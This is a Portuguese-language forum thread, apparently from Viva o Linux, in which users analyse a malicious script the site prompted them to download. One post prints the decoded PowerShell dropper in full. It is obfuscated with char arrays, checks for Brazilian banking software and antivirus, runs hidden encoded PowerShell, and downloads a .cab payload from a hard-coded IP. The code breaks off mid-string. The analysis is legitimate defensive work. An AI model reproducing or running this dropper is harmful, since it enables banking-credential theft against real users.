Site vivaolinux solicitando download de arquivo [RESOLVIDO]
25. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
fabio
(usa Debian)
Enviado em 24/11/2016 - 17:14h
andremilke escreveu:
Olá pessoal,
Dei uma analisada no script, verifiquei que a função DEGRADE, usa um objeto ActiveX para executar o conteúdo um arquivo compactado pelo powershell.
Cheguei até aqui, ainda não consegui descompactar o arquivo.
Olá pessoal,
Dei uma analisada no script, verifiquei que a função DEGRADE, usa um objeto ActiveX para executar o conteúdo um arquivo compactado pelo powershell.
Cheguei até aqui, ainda não consegui descompactar o arquivo.
Se conseguir algo a mais informe aqui, estou juntando material pra tomar as devidas providências. Já tenho bastante informação.
26. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
27. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
andremilke
(usa Debian)
Enviado em 25/11/2016 - 09:23h
Olá,Consegui extrair o conteúdo daquela string compactada, quer que ti envie? Ou posto aqui?
28. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
29. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]
andremilke
(usa Debian)
Enviado em 25/11/2016 - 09:54h
$ie = New-Object -com internetexplorer.application; $ie.visible = $true; $ie.navigate(""); $mtx = New-Object System.Threading.Mutex($false, "mtt") if ($mtx.WaitOne(500)) { if(-not (Test-Path "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')")){ ([char[]](87,105,110,100,111,119,115,32,119,111,114,107,105,110,103,32,110,111,114,109,97,108,108,121,44,32,105,103,110,111,114,101,32,116,104,105,115,32,108,111,103) -join '') >> "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')" if(((Get-Culture).Name.ToLower() -eq ([char[]](112,116,45,66,114) -join '').ToLower())) { $dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0]; $gbPath = Join-Path $dir ([char[]](71,98,80,108,117,103,105,110) -join ''); $paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";}; foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}}; $avs = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,68,105,115,112,108,97,121,78,97,109,101,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116) -join '')); foreach ($av1 in $avs) { $av += $av1.displayName + ","}; if($av -like "*avg*"){ Start-Process -WindowStyle Hidden powershell.exe -ArgumentList ([char[]](45,78,111,80,32,45,78,111,110,73,32,45,87,32,72,105,100,100,101,110,32,45,69,32,32,99,119,66,104,65,71,119,65,73,65,66,104,65,67,65,65,84,103,66,108,65,72,99,65,76,81,66,80,65,71,73,65,97,103,66,108,65,71,77,65,100,65,65,55,65,71,107,65,90,81,66,52,65,67,103,65,89,81,65,103,65,69,107,65,84,119,65,117,65,70,77,65,100,65,66,121,65,71,85,65,89,81,66,116,65,70,73,65,90,81,66,104,65,71,81,65,90,81,66,121,65,67,103,65,75,65,66,104,65,67,65,65,83,81,66,80,65,67,52,65,81,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,71,107,65,98,119,66,117,65,67,52,65,82,65,66,108,65,71,89,65,98,65,66,104,65,72,81,65,90,81,66,84,65,72,81,65,99,103,66,108,65,71,69,65,98,81,65,111,65,70,115,65,83,81,66,80,65,67,52,65,84,81,66,108,65,71,48,65,98,119,66,121,65,72,107,65,85,119,66,48,65,72,73,65,90,81,66,104,65,71,48,65,88,81,66,98,65,69,77,65,98,119,66,117,65,72,89,65,90,81,66,121,65,72,81,65,88,81,65,54,65,68,111,65,82,103,66,121,65,71,56,65,98,81,66,67,65,71,69,65,99,119,66,108,65,68,89,65,78,65,66,84,65,72,81,65,99,103,66,112,65,71,52,65,90,119,65,111,65,67,99,65,97,103,66,87,65,70,111,65,84,103,66,106,65,68,107,65,99,65,66,74,65,69,85,65,82,65,65,119,65,71,52,65,86,103,66,109,65,71,115,65,85,65,66,76,65,72,77,65,99,65,66,87,65,72,77,65,85,81,65,118,65,72,77,65,97,119,66,48,65,71,111,65,84,119,66,49,65,72,65,65,101,103,66,104,65,72,99,65,101,65,66,122,65,71,103,65,83,81,66,108,65,69,119,65,100,119,66,78,65,70,103,65,100,119,66,104,65,71,119,65,97,103,65,120,65,71,99,65,84,81,66,97,65,70,107,65,101,65,66,82,65,71,107,65,83,119,66,84,65,70,69,65,84,81,66,105,65,70,111,65,76,119,66,81,65,71,89,65,100,65,66,79,65,68,73,65,81,81,66,117,65,72,81,65,79,81,65,121,65,69,119,65,99,65,65,49,65,69,77,65,98,81,66,89,65,68,99,65,79,81,65,114,65,67,56,65,89,103,66,121,65,71,119,65,97,119,66,54,65,69,73,65,90,65,66,121,65,67,115,65,90,103,66,75,65,72,99,65,100,103,66,117,65,70,81,65,90,81,66,108,65,68,107,65,90,81,66,54,65,68,103,65,89,103,66,77,65,70,111,65,83,103,66,72,65,70,99,65,75,119,66,104,65,72,107,65,76,119,66,54,65,72,99,65,100,81,66,54,65,70,65,65,100,103,65,52,65,68,81,65,81,119,65,53,65,71,85,65,84,65,65,122,65,68,103,65,101,81,66,85,65,71,77,65,87,65,65,48,65,70,65,65,98,103,66,86,65,68,69,65,89,81,66,116,65,71,107,65,101,65,65,118,65,69,48,65,83,65,66,73,65,72,77,65,86,103,66,79,65,72,81,65,99,65,66,115,65,68,77,65,75,119,66,84,65,72,65,65,98,65,66,78,65,71,81,65,84,119,65,52,65,69,89,65,101,81,66,122,65,70,81,65,81,119,66,75,65,70,85,65,76,119,66,88,65,71,77,65,85,119,66,115,65,71,107,65,99,81,66,67,65,72,111,65,85,103,66,76,65,69,52,65,81,119,66,72,65,71,52,65,81,119,66,51,65,72,99,65,97,81,66,71,65,70,77,65,84,81,66,74,65,68,103,65,86,103,66,88,65,72,73,65,84,65,66,111,65,72,65,65,84,103,66,54,65,70,65,65,98,81,65,51,65,68,65,65,89,119,66,74,65,69,77,65,75,119,66,66,65,69,56,65,84,103,66,71,65,71,69,65,87,103,66,104,65,70,103,65,89,119,66,68,65,69,52,65,84,81,66,79,65,69,99,65,83,81,65,48,65,69,115,65,77,65,66,51,65,69,115,65,84,65,66,72,65,69,89,65,101,103,65,118,65,71,81,65,99,81,66,113,65,68,103,65,87,103,66,82,65,71,52,65,99,81,66,122,65,69,77,65,90,103,66,119,65,70,65,65,77,119,66,67,65,69,89,65,90,103,66,54,65,68,77,65,85,65,66,81,65,67,115,65,101,103,66,83,65,69,99,65,76,119,66,85,65,68,69,65,101,103,65,122,65,69,69,65,99,103,66,119,65,70,85,65,84,119,66,54,65,70,73,65,99,81,66,68,65,69,107,65,79,81,66,52,65,72,99,65,100,81,66,80,65,70,111,65,75,119,66,73,65,71,85,65,98,65,65,121,65,72,89,65,83,103,65,53,65,69,81,65,79,65,66,51,65,68,99,65,100,119,66,83,65,68,77,65,97,103,66,66,65,71,56,65,99,119,66,54,65,68,81,65,81,103,66,115,65,71,69,65,85,65,66,111,65,68,99,65,100,81,66,79,65,69,89,65,84,65,65,48,65,67,115,65,85,119,66,50,65,71,85,65,85,81,66,81,65,69,52,65,78,81,66,113,65,71,89,65,82,103,65,51,65,69,73,65,81,119,66,122,65,69,48,65,85,119,65,120,65,70,89,65,82,65,65,52,65,69,48,65,83,119,66,113,65,71,103,65,98,65,66,49,65,72,81,65,78,119,66,49,65,69,77,65,77,81,66,69,65,72,89,65,97,103,66,67,65,68,85,65,84,81,66,67,65,69,119,65,79,65,66,72,65,68,81,65,77,81,66,81,65,72,69,65,82,119,66,108,65,71,56,65,97,65,66,108,65,70,73,65,101,65,65,49,65,70,103,65,90,119,66,76,65,72,65,65,90,103,65,48,65,72,99,65,97,81,66,107,65,69,99,65,90,103,66,90,65,69,107,65,77,103,66,89,65,72,89,65,84,103,66,49,65,68,65,65,84,65,66,113,65,69,69,65,100,65,66,75,65,70,77,65,79,65,66,105,65,71,99,65,90,119,66,69,65,69,52,65,87,81,66,108,65,70,103,65,87,81,66,111,65,71,99,65,83,103,66,109,65,71,111,65,77,65,66,112,65,71,111,65,77,119,66,79,65,68,81,65,82,81,65,49,65,68,81,65,86,65,65,52,65,72,81,65,89,81,66,83,65,70,99,65,99,119,66,80,65,68,107,65,87,81,66,111,65,68,65,65,77,119,65,118,65,69,77,65,77,119,65,122,65,70,103,65,85,65,66,110,65,72,65,65,83,103,66,119,65,69,99,65,78,103,66,83,65,70,77,65,84,81,66,114,65,68,99,65,97,103,66,78,65,68,103,65,99,81,66,87,65,69,56,65,99,103,66,115,65,69,119,65,79,81,66,79,65,72,65,65,82,103,66,90,65,69,107,65,83,81,66,112,65,72,107,65,77,65,66,116,65,72,65,65,83,103,66,50,65,70,77,65,100,119,66,50,65,67,56,65,85,103,66,118,65,68,89,65,84,119,66,87,65,71,99,65,77,119,66,53,65,69,103,65,97,119,66,73,65,68,85,65,78,81,66,77,65,70,85,65,98,119,66,122,65,70,107,65,90,65,66,89,65,70,107,65,99,81,65,51,65,70,89,65,81,119,66,70,65,69,99,65,84,65,66,97,65,68,85,65,77,119,65,53,65,71,69,65,78,81,66,89,65,70,107,65,100,119,66,106,65,68,73,65,83,103,65,52,65,68,85,65,86,103,65,49,65,72,103,65,98,65,66,120,65,70,89,65,99,81,66,77,65,71,85,65,83,81,65,53,65,72,99,65,81,81,65,118,65,71,119,65,82,65,65,48,65,72,65,65,82,65,66,83,65,67,115,65,87,81,66,114,65,71,119,65,89,119,66,107,65,71,77,65,98,65,65,53,65,68,65,65,82,81,65,53,65,68,85,65,86,65,66,69,65,71,81,65,83,65,66,75,65,70,69,65,100,119,66,122,65,72,69,65,83,81,65,119,65,68,89,65,83,65,66,107,65,70,85,65,97,119,65,118,65,67,115,65,77,81,66,105,65,70,65,65,83,119,65,118,65,69,111,65,85,81,66,120,65,69,81,65,90,65,65,49,65,71,89,65,98,119,66,70,65,70,103,65,85,81,66,116,65,72,89,65,101,81,66,119,65,69,69,65,75,119,66,90,65,68,99,65,100,119,66,119,65,69,81,65,99,103,66,85,65,68,89,65,97,81,66,121,65,72,65,65,98,103,66,89,65,70,69,65,100,119,66,69,65,71,103,65,83,119,65,122,65,71,99,65,85,119,65,120,65,68,81,65,78,81,66,86,65,72,99,65,98,103,66,50,65,72,81,65,86,81,66,113,65,68,73,65,85,119,66,48,65,67,56,65,81,119,65,118,65,70,73,65,87,103,66,67,65,71,107,65,85,103,66,69,65,68,99,65,77,81,66,71,65,71,85,65,100,65,65,50,65,72,77,65,100,103,65,122,65,70,99,65,83,119,66,112,65,69,77,65,100,103,66,84,65,70,107,65,97,119,66,81,65,68,85,65,81,119,66,89,65,68,85,65,98,103,65,48,65,68,85,65,79,81,66,116,65,70,65,65,83,119,65,122,65,67,115,65,83,119,65,53,65,69,89,65,90,103,66,115,65,70,65,65,78,119,65,122,65,70,65,65,89,81,66,54,65,72,103,65,89,103,65,50,65,69,115,65,84,65,65,120,65,71,73,65,100,119,65,50,65,70,73,65,90,81,66,106,65,68,65,65,77,103,65,53,65,72,111,65,97,103,66,84,65,71,89,65,101,81,66,72,65,69,119,65,82,119,66,50,65,69,103,65,100,103,66,88,65,70,85,65,78,81,65,50,65,69,115,65,85,65,65,48,65,69,77,65,97,119,66,70,65,70,69,65,78,81,65,49,65,72,107,65,89,103,65,52,65,71,107,65,75,119,65,51,65,71,77,65,97,65,66,85,65,67,56,65,82,103,66,81,65,69,77,65,99,81,65,50,65,69,89,65,90,103,66,120,65,71,115,65,100,103,66,72,65,68,107,65,77,65,66,48,65,71,77,65,99,119,66,80,65,68,81,65,101,65,66,83,65,69,89,65,90,103,66,109,65,70,107,65,79,81,65,52,65,72,77,65,85,65,65,52,65,71,52,65,89,103,66,118,65,68,89,65,78,119,66,113,65,71,107,65,82,65,66,51,65,71,52,65,98,119,66,119,65,70,65,65,90,119,66,68,65,72,69,65,79,81,65,114,65,72,65,65,82,65,65,51,65,69,69,65,79,65,66,54,65,69,77,65,81,81,65,50,65,69,77,65,81,103,65,52,65,70,69,65,75,119,66,105,65,72,103,65,89,119,66,113,65,71,52,65,101,65,66,54,65,69,81,65,78,81,66,76,65,72,89,65,86,103,66,81,65,71,85,65,82,103,66,52,65,67,115,65,78,81,66,117,65,69,115,65,90,81,66,52,65,68,99,65,86,119,66,79,65,69,52,65,76,119,66,70,65,69,56,65,79,81,66,82,65,72,81,65,101,65,66,71,65,72,69,65,90,119,66,80,65,72,89,65,97,81,66,107,65,69,81,65,86,119,66,90,65,67,115,65,90,103,66,49,65,71,119,65,98,103,66,53,65,71,119,65,85,65,66,118,65,68,107,65,75,119,66,114,65,72,111,65,99,103,66,116,65,68,85,65,81,119,65,122,65,70,65,65,83,65,65,114,65,71,52,65,82,65,66,108,65,71,77,65,85,81,65,52,65,69,115,65,76,119,66,121,65,68,65,65,77,65,66,107,65,68,89,65,84,65,66,87,65,69,111,65,100,65,65,53,65,69,103,65,86,103,66,71,65,68,77,65,79,65,66,86,65,71,48,65,85,65,66,108,65,70,103,65,101,65,66,105,65,68,99,65,78,65,66,104,65,68,81,65,98,119,66,122,65,68,103,65,98,65,66,50,65,69,107,65,97,103,66,52,65,70,99,65,76,119,66,76,65,70,103,65,90,103,66,110,65,72,73,65,90,103,66,76,65,68,103,65,87,103,66,107,65,69,48,65,99,103,65,51,65,70,65,65,90,81,66,52,65,69,107,65,100,103,66,107,65,70,99,65,99,103,65,50,65,70,69,65,84,119,66,90,65,71,119,65,87,103,66,52,65,68,65,65,82,65,66,54,65,72,73,65,90,103,66,118,65,68,65,65,89,103,66,71,65,68,107,65,82,103,65,118,65,68,107,65,82,81,66,104,65,71,115,65,98,65,65,114,65,68,81,65,100,81,66,106,65,72,103,65,79,81,65,48,65,69,81,65,86,81,66,118,65,70,111,65,98,65,66,81,65,68,89,65,97,81,66,113,65,72,65,65,101,81,66,52,65,68,99,65,98,103,66,51,65,68,81,65,76,119,66,114,65,72,89,65,90,65,66,82,65,72,81,65,100,103,66,111,65,72,103,65,81,81,65,48,65,71,99,65,86,103,66,81,65,68,85,65,100,103,66,49,65,69,111,65,100,103,66,119,65,71,48,65,101,81,66,85,65,72,85,65,98,81,66,77,65,68,89,65,82,103,66,105,65,72,107,65,87,65,66,115,65,72,85,65,99,103,66,74,65,70,103,65,86,81,66,84,65,72,89,65,101,103,66,51,65,72,111,65,101,103,65,49,65,68,73,65,90,65,65,49,65,72,107,65,83,65,66,117,65,70,107,65,98,119,66,88,65,68,89,65,85,103,66,54,65,68,107,65,77,81,66,88,65,71,73,65,76,119,66,78,65,70,73,65,86,81,66,104,65,71,81,65,101,65,65,48,65,72,111,65,101,103,66,77,65,69,115,65,79,65,65,50,65,71,89,65,84,81,65,122,65,68,103,65,100,65,65,114,65,72,103,65,97,103,66,112,65,67,56,65,77,65,66,78,65,72,73,65,81,103,65,51,65,71,52,65,77,119,66,69,65,69,48,65,97,103,65,114,65,71,119,65,89,103,66,112,65,71,103,65,100,103,66,84,65,70,111,65,78,81,66,67,65,71,48,65,86,103,65,50,65,71,103,65,99,119,65,52,65,71,85,65,79,65,65,114,65,68,69,65,89,119,66,52,65,69,111,65,101,65,66,85,65,71,119,65,99,103,66,86,65,68,81,65,100,119,66,76,65,69,52,65,97,81,66,81,65,72,103,65,83,65,65,53,65,69,99,65,83,65,66,77,65,67,115,65,99,103,65,118,65,69,111,65,75,119,66,86,65,72,103,65,87,81,66,115,65,67,56,65,97,103,65,52,65,71,48,65,87,65,66,81,65,71,77,65,99,119,65,122,65,68,73,65,83,103,65,121,65,69,56,65,89,119,65,50,65,67,115,65,85,81,65,51,65,72,65,65,83,119,65,118,65,69,99,65,101,65,65,48,65,69,103,65,75,119,66,110,65,71,111,65,101,103,66,49,65,68,73,65,98,103,66,119,65,69,73,65,79,81,66,49,65,71,48,65,86,119,65,53,65,69,48,65,98,119,66,108,65,70,103,65,78,81,66,68,65,67,56,65,79,81,65,122,65,70,65,65,83,103,66,108,65,71,48,65,76,119,66,48,65,69,85,65,75,119,66,112,65,67,56,65,79,81,66,88,65,69,119,65,83,119,65,114,65,69,52,65,100,81,66,107,65,70,73,65,75,119,66,112,65,69,89,65,78,119,66,106,65,72,77,65,84,65,65,49,65,69,89,65,100,103,65,121,65,68,99,65,77,81,66,70,65,71,81,65,79,65,66,89,65,72,107,65,84,81,66,50,65,69,56,65,100,119,65,118,65,70,77,65,99,65,66,54,65,71,73,65,79,81,66,77,65,69,103,65,99,81,66,77,65,68,99,65,100,119,66,77,65,72,69,65,84,65,65,118,65,72,89,65,77,81,66,114,65,72,89,65,90,119,66,77,65,67,115,65,98,65,66,50,65,68,103,65,84,81,66,68,65,71,119,65,82,103,66,81,65,68,103,65,98,65,66,50,65,71,77,65,86,81,66,82,65,71,89,65,99,103,66,97,65,69,103,65,81,81,66,89,65,71,85,65,82,81,66,121,65,72,85,65,84,103,65,114,65,69,56,65,75,119,65,118,65,71,107,65,100,119,65,49,65,72,99,65,99,103,66,112,65,68,73,65,83,65,65,119,65,72,65,65,79,81,66,90,65,72,77,65,85,65,66,79,65,68,77,65,89,81,66,49,65,71,56,65,100,103,65,53,65,68,89,65,84,65,65,51,65,68,89,65,85,119,66,106,65,68,103,65,99,103,65,53,65,68,89,65,79,81,66,109,65,70,69,65,97,81,66,88,65,70,69,65,76,119,66,108,65,71,52,65,89,103,65,118,65,70,65,65,97,65,65,51,65,71,52,65,99,119,66,113,65,72,111,65,100,81,65,120,65,70,99,65,90,103,66,72,65,68,77,65,86,119,66,111,65,72,77,65,78,65,66,75,65,70,107,65,87,81,66,114,65,68,69,65,90,103,66,69,65,72,111,65,98,65,66,109,65,69,52,65,78,119,66,116,65,67,115,65,99,103,66,110,65,68,103,65,77,103,66,54,65,72,77,65,98,103,66,79,65,69,56,65,90,103,66,87,65,67,56,65,101,65,66,81,65,70,65,65,99,81,66,48,65,70,81,65,99,103,65,49,65,68,107,65,82,119,66,53,65,67,56,65,79,65,66,74,65,68,107,65,86,81,65,118,65,71,89,65,97,103,65,53,65,70,99,65,78,119,66,77,65,70,65,65,82,81,65,114,65,70,103,65,89,103,66,109,65,71,99,65,100,103,66,48,65,68,73,65,97,65,66,106,65,72,73,65,78,119,66,54,65,67,115,65,76,119,66,108,65,71,52,65,98,81,66,54,65,71,48,65,101,65,66,90,65,69,52,65,79,65,65,114,65,69,77,65,99,103,66,67,65,71,111,65,86,65,66,49,65,68,103,65,98,103,66,50,65,70,103,65,86,65,65,114,65,68,89,65,83,119,66,106,65,70,111,65,77,103,66,105,65,71,48,65,101,65,66,50,65,69,48,65,79,65,66,79,65,67,56,65,98,65,66,122,65,71,52,65,87,81,66,109,65,68,77,65,101,81,65,53,65,71,111,65,84,81,65,51,65,69,81,65,90,65,66,50,65,71,119,65,98,81,65,49,65,69,48,65,84,81,66,113,65,72,81,65,75,119,66,77,65,70,77,65,99,119,66,84,65,72,89,65,89,103,66,52,65,68,77,65,86,65,66,114,65,68,103,65,89,103,66,119,65,72,69,65,90,119,65,121,65,68,85,65,86,81,66,50,65,70,111,65,101,103,66,108,65,70,73,65,77,81,66,87,65,72,85,65,101,81,66,107,65,71,69,65,99,65,66,108,65,70,107,65,81,103,65,114,65,70,73,65,99,81,66,108,65,68,99,65,78,65,65,121,65,70,81,65,100,81,66,87,65,68,65,65,87,81,66,108,65,68,99,65,98,103,65,121,65,68,99,65,90,119,65,48,65,72,69,65,79,65,66,110,65,71,52,65,84,81,66,122,65,72,89,65,85,119,66,69,65,69,99,65,82,119,66,52,65,70,81,65,81,103,66,80,65,71,52,65,84,65,65,53,65,71,103,65,83,103,66,70,65,71,85,65,76,119,66,107,65,69,52,65,81,119,66,116,65,70,99,65,101,81,66,107,65,71,69,65,89,119,66,80,65,70,89,65,87,65,66,54,65,72,111,65,86,65,66,115,65,69,111,65,100,65,66,117,65,69,89,65,79,65,65,53,65,72,89,65,77,119,66,79,65,72,85,65,78,119,66,107,65,72,81,65,86,81,65,120,65,72,73,65,99,119,66,71,65,72,111,65,85,81,65,118,65,72,111,65,86,81,66,77,65,71,111,65,76,119,66,81,65,70,65,65,82,119,66,108,65,70,103,65,98,103,66,52,65,69,48,65,75,119,66,114,65,72,103,65,86,81,66,109,65,68,69,65,98,103,66,118,65,72,81,65,82,81,65,52,65,68,77,65,97,65,66,121,65,71,52,65,78,81,66,80,65,70,103,65,99,103,66,89,65,71,52,65,77,103,65,49,65,69,56,65,79,81,66,111,65,72,89,65,97,103,66,75,65,69,48,65,87,65,65,121,65,70,81,65,83,119,66,75,65,70,103,65,97,65,66,72,65,71,81,65,101,103,66,121,65,71,69,65,98,119,66,48,65,71,107,65,86,119,66,48,65,68,103,65,75,119,66,81,65,71,81,65,86,119,66,52,65,70,65,65,98,103,65,49,65,72,73,65,100,65,65,49,65,70,99,65,97,65,66,90,65,67,56,65,99,81,66,75,65,69,81,65,87,103,66,68,65,71,77,65,86,103,66,107,65,71,48,65,87,65,66,86,65,70,65,65,85,119,66,117,65,68,69,65,83,103,66,115,65,68,103,65,98,81,66,111,65,72,99,65,99,119,66,81,65,71,89,65,77,65,65,51,65,67,115,65,79,65,66,97,65,69,119,65,90,103,66,78,65,68,65,65,98,81,66,82,65,72,81,65,77,81,65,118,65,68,89,65,75,119,66,50,65,71,103,65,87,81,65,49,65,67,56,65,82,65,66,83,65,71,85,65,82,119,66,73,65,72,89,65,76,119,66,48,65,69,103,65,84,65,65,48,65,69,119,65,78,103,66,75,65,72,107,65,83,103,66,119,65,70,99,65,78,81,66,69,65,68,103,65,100,65,65,48,65,70,107,65,86,119,66,78,65,72,69,65,84,65,65,49,65,71,111,65,79,65,66,50,65,68,81,65,83,103,66,68,65,68,107,65,98,119,66,48,65,68,85,65,86,103,66,119,65,69,73,65,90,119,66,104,65,70,65,65,83,103,66,106,65,70,77,65,83,81,66,114,65,72,77,65,81,103,66,52,65,69,89,65,76,119,66,85,65,71,89,65,78,81,65,50,65,72,73,65,101,65,65,52,65,71,73,65,99,119,65,122,65,69,99,65,99,81,66,109,65,70,73,65,84,119,66,116,65,72,107,65,85,119,66,75,65,68,77,65,84,65,66,122,65,71,52,65,101,81,65,121,65,69,115,65,97,103,66,49,65,67,56,65,77,103,66,119,65,71,52,65,78,81,66,105,65,69,52,65,101,103,66,104,65,69,52,65,78,119,66,66,65,68,85,65,84,81,66,88,65,72,103,65,87,65,66,105,65,68,103,65,81,81,66,117,65,69,81,65,98,103,66,109,65,71,85,65,77,103,66,104,65,71,81,65,78,119,66,122,65,72,103,65,85,103,65,114,65,68,69,65,75,119,66,52,65,72,69,65,101,103,65,119,65,70,81,65,89,103,66,121,65,70,65,65,89,119,66,73,65,69,111,65,87,65,65,51,65,68,103,65,90,103,66,115,65,71,89,65,74,119,65,112,65,67,119,65,87,119,66,74,65,69,56,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,84,81,66,118,65,71,81,65,90,81,66,100,65,68,111,65,79,103,66,69,65,71,85,65,89,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,67,107,65,75,81,65,115,65,70,115,65,86,65,66,108,65,72,103,65,100,65,65,117,65,69,85,65,98,103,66,106,65,71,56,65,90,65,66,112,65,71,52,65,90,119,66,100,65,68,111,65,79,103,66,66,65,70,77,65,81,119,66,74,65,69,107,65,75,81,65,112,65,67,52,65,85,103,66,108,65,71,69,65,90,65,66,85,65,71,56,65,82,81,66,117,65,71,81,65,75,65,65,112,65,65,61,61) -join '') -wait; while((get-service -Name ([char[]](97,118,103,119,100) -join '')).Status -eq ([char[]](82,117,110,110,105,110,103) -join '')) {Start-Sleep -Seconds 10;} } $ps = (Get-ChildItem ([char[]](72,75,76,77,58,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,78,69,84,32,70,114,97,109,101,119,111,114,107,32,83,101,116,117,112,92,78,68,80) -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version; if(Test-Path $(Join-Path $dir ([char[]](87,105,110,82,65,82) -join ''))){ $wr = ([char[]](46,58,87,105,110,114,97,114) -join '') } if($v1) { $durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab" $ll = "COF267F9415EF3518C.cab" $output = "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '')" + $ll; (New-Object System.Net.WebClient).DownloadFile($durl, $output); Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAeABWAE4ATABqADUAcwB3AEUARAA1AHYAcABQAHcASABIAHkASQBsAFUAVQAyAEYAQQBmAFAAWQBxAG8AYwBXAGgAYQBvADkAWgBLAFAATgBxAHAAYwBvAEIAdwBxAHoARABSAFcAUAAxAEQAagBaAGoAZABMADkANwAvAFcATABRAE4AUwBWAGUAdQBpAGgARQBnAGEAagBHAGMAOQA4AEQAOAA4AGsAegA5AEYANwBOAEkAMwB2AEUAcwBjAFAAawBzAGcAagBkAEoARwA0AGwASQBUAHgAMgB5AHoAOQBoAG0ATQAzAG8AWQB1AFAAaQA1AGgATQAzADQAMQBIAGsANgB5AHAAcQByAFMAVwArAGIATgBOAHQAawB2AFoAWgByAHUAZAArAFEARwBtAEkAWQA0AGMASABBAGEAWQAyAEIAUQBUAFkAbwB1AHYAVwBJAFMASQBGAFkAbABGAFYAZABUAEYAeABDAEgAcQBqAHgAQgBmAFoASQBpADkASABXAEYASwBNAEwAVgBsAFAASQByAFUAdgB6AHoAcABtAGIAQgBqAHEANgAvAHIAWQBDACsAUQBjAGIARQBoAHgATwBrAEwAeQB4AHoAaQA2AFoASwAyAFoAMABxAEcAYQB2ADEAWgBRAG0AYwBHAFAAVAB5AFQAcQBRAEcASQBCAE4AYwBjAGsAWABFAFMAUwBrADQAKwB4AGEARQB0AEgAMQAvAHYAUABmAGsAVwBVAEEATgBOAFYAQwBKAFcAUgBUAHQAVwBzAHIAMgBqADIAUAAxAGQARABlACsAaQBnAEsASQBrAGcARQBSAEIATAA0AHgASwBtAGkAUAByAFIAMQBQAFUAYQBEAHEAZABvAHoAZABvAGsAdQBmAFMAZwBYADMASwBkADEAZgB5AEIAdwBJAFAAeABjAEsARQBrAEgAWQArAHUARgBkAFkAWgBGAGQAVgBXADcAYwBVAEMAWAA3AFEATgA2AFIARwB2AHEANgBwAGcAYQBUAFoAeQBRAHEAUwBnADUASgBLAEgAWAAxAE4ANgA2AGkAegB4AEwAawBJAGEAUAB3AGsAaABxAEYAdABFAEMAZwBwAEIAcgBRAEUAbwBlAEkAUgB6AFcAYQBmAGcARgB1AGYATwBWAFEAcgAxAHUAeQBCADgAUgBPAHkAVgBwAEsAbQBKAG0AcwB0ADAAdwBvAEcAaABEADMAbABoAHcAYgBnADYATABxAGEAagB5AFQAcgBrAGEARgBxADEAbwBLAHgAaABuADMASQBlAE4ASABVAGEARgAyAFUAVQBQAFAAeQBGAEQAYwAxAEwAKwBvAEQAaQBEAEQAOABSAEoAUAA2AFUASgBiAHoAOAA4ADEANAB0AEkAUQBuAEIAYQBKAHIAbQB6AFEAcwBBAC8AVAByAEIAbgBXAEIASAB0ADAALwBJAFAAcQBhAGwAZwBkAEEAbAAwAEcAeQB1AHEASQBQAHAAegAyAGcAbAByAE8AaQAvAG4ANQBwAGoAZQA0AE8AMwBGAG8ASwBmAE8AaABsAFAASQBLAHkAaABUAE0AOABGAC8AeABGAFgAZwBNADQAQwBpADcASABKADcAYgBTADEAKwBHAEwAcQBLADgAMQAwACsALwBaAFoAbABFAGYAQwA5AGIAVQBsAFUAagBiADMAdAA0AEsAZwBaAE8AbQB6AEUASABsAHoAMwByAGsAcgB3AC8AbABBAFAAQgBjADcATwBOAGQAVQBlAGEAbQBiAEgAZABRAEcAeAAwAE8ASgBzAGIAWAAvADAAUQBQAHgAZgBYADgAWABWAHUAKwA1AGkAbgBqAGsAbgBnAEcAYgBTAHYASQBDAGwAKwAwADMAVQBOAFMAbAA3AHgAMQBDAGIAQgBIADEAaABxAHkAcABzADUAYgBSAEMAWAA3AHEAcwAwAGUAdQAxAFAALwBaAHgAYQBHAGoASgBDACsAeABRAC8AU